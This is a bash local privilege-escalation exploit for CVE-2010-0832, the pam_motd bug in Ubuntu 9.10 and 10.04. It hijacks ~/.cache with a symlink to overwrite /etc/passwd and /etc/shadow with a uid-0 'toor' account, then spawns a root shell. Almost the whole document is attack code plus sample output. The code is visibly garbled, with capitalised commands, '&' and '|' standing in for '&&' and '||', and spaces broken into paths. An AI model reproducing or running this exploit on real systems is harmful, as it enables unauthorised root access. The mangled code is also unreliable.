#! /Bin/bash
#
# Exploit Title: Ubuntu pam motd local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude-y update; sudo aptitude-y install libpam ~ N ~ I
#
#
# Local root by adding temporary user toor: toor with id 0 to/etc/passwd &/etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
# User @ ubuntu :~ $ Bash ubuntu-pam-motd-localroot.sh
# [*] Ubuntu pam motd local root
# [*] Backuped/home/user/. ssh/authorized_keys
# [*] SSH key set up
# [*] Backuped/home/user/. cache
# [*] Spawn ssh
# [+] Owned:/etc/passwd
# [*] Spawn ssh
# [+] Owned:/etc/shadow
# [*] Restored/home/user/. cache
# [*] Restored/home/user/. ssh/authorized_keys
# [*] SSH key removed
# [+] Success! Use password toor to get root
# Password:
# Root @ ubuntu:/home/user # id
# Uid = 0 (root) gid = 0 (root) groupes = 0 (root)
#
P = toor: x: 0: 0: root:/bin/bash
S = toor: $6 $ tPuRrLW7 $ m0BvNoYS9FEF9/Lzv6PQospujOKt0giv. Small. VZwCcEcYQU5q2DLX. cI7NQtsNz1: 14798: 0: 99999: 7 :::
Echo "[*] Ubuntu pam motd local root"
[-Z "$ (which ssh)"] & echo "[-] ssh is a requirement" & exit 1
[-Z "$ (which ssh-keygen)"] & echo "[-] ssh-keygen is a requirement" & exit 1
[-Z "$ (ps-u root | grep sshd)"] & echo "[-] a running sshd is a requirement" & exit 1
Backup (){
[-E "$1"] & [-e "$1". bak] & rm-rf "$1". bak
[-E "$1"] | return 0
Mv "$1" {,. bak} | return 1
Echo "[*] Backuped $1"
}
Restore (){
[-E "$1"] & rm-rf "$1"
[-E "$1". bak] | return 0
Mv "$1" {. bak,} | return 1
Echo "[*] Restored $1"
}
Key_create (){
Backup ~ /. Ssh/authorized_keys
Ssh-keygen-q-t rsa-N-C pam-f "$ KEY" | return 1
[! -D ~ /. Ssh] & {mkdir ~ /. Ssh | return 1 ;}
Mv "$ KEY. pub "~ /. Ssh/authorized_keys | return 1
Echo "[*] SSH key set up"
}
Key_remove (){
Rm-f "$ KEY"
Restore ~ /. Ssh/authorized_keys
Echo "[*] SSH key removed"
}
Own (){
[-E ~ /. Cache] & rm-rf ~ /. Cache
Ln-s "$1 "~ /. Cache | return 1
Echo "[*] spawn ssh"
Ssh-o NoHostAuthenticationForLocalhost yes-I "$ KEY" localhost true
[-W "$1"] | {echo "[-] Own $1 failed"; restore ~ /. Cache; bye ;}
Echo "[+] owned: $1"
}
Bye (){
Key_remove
Exit 1
}
KEY = "$ (mktemp-u )"
Key_create | {echo "[-] Failed to setup SSH key"; exit 1 ;}
Backup ~ /. Cache | {echo "[-] Failed to backup ~ /. Cache "; bye ;}
Own/etc/passwd & echo "$ P">/etc/passwd
Own/etc/shadow & echo "$ S">/etc/shadow
Restore ~ /. Cache | {echo "[-] Failed to restore ~ /. Cache "; bye ;}
Key_remove
Echo "[+] Success! Use password toor to get root"
Su-c "sed-I/toor:/d/etc/{passwd, shadow}; chown root:/etc/{passwd, shadow };
Chgrp shadow/etc/shadow; nscd-I passwd>/dev/null 2> & 1; bash "toor